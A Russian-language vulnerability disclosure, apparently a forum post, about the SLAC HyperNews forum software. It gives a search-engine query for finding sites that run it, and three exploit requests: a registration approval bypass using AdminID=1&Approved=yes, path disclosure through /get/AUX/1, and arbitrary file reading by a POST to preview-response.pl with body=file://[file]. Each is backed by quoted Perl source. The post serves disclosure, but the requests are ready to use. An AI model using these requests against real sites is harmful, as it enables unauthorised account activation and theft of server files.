Сайт CMS: http://hypernews.slac.stanford.edu/hn/download/ Сайты на SLAC HyperNews: https://www.google.ru/search?q="This+site+runs+SLAC+HyperNews" 1. Подтверждение регистрации на премодерируемых форумах: http://[Ссылка для подтверждения]&AdminID=1&Approved=yes validate-email.pl line 34-35: Code: my $adminid = $in{'AdminID'}; my $approved = $in{'Approved'}; validate-email.pl line 240-249: Code: if ($moderateMembership == 1 && $adminid ne "" && $approved eq "yes" ) { print "<BR> The approval email has been sent to the user. Thanks!" if $Email; print "<BR> The account has been activated. User $userid does not have an email address. Please inform $userid that his or her account is ready. " if !$Email; } else { print "\nCongratulations! Your account '$userid' has been approved and activated. An email will be sent to you for the record."; print qq { <pre> $ins }; } 2. Раскрытие путей: 2.1 $hndocs http://[SLAC HyperNews URL]/get/AUX/1 get line 209-221: Code: my $base_dir; if ($URL =~ /^\/AUX\/.*/) { &HNMsg("[get-11] (get) attachment: $hndocs$base_dir\n") if $debug; $base_dir = $URL; } else { &HNMsg("[get-12] (get) base urc file: $hndocs$base_dir.html,urc\n") if $debug; $base_dir = url2forum($URL); } #___________________________________________________________________ # One global to hold the forum that the message is in. $the_forum = HN::Message->get($base_dir); 2.2 $hnPeople См. 3 3. Чтение произвольных файлов. http://[SLAC HyperNews URL]/preview-response.pl => POST-запрос с параметром contentType=URL и body=file://[file] preview-response.pl line 160-171: Code: if ($contentType eq 'URL' && $body =~ /^file:/) { &HNMsg("[pvres-7] (PreviewResponsePL) Open URL file ") if $debug; $contentType = "Plain Text"; ($body) = split("\n",$body); $body =~ s/[ \t\n]+//g; if (open(EXTFILE,"<".substr($body,5))) { $body = join('',<EXTFILE>); close(EXTFILE); } else { &HNError("Cannot open file URL $body\n"); } } # end of babar
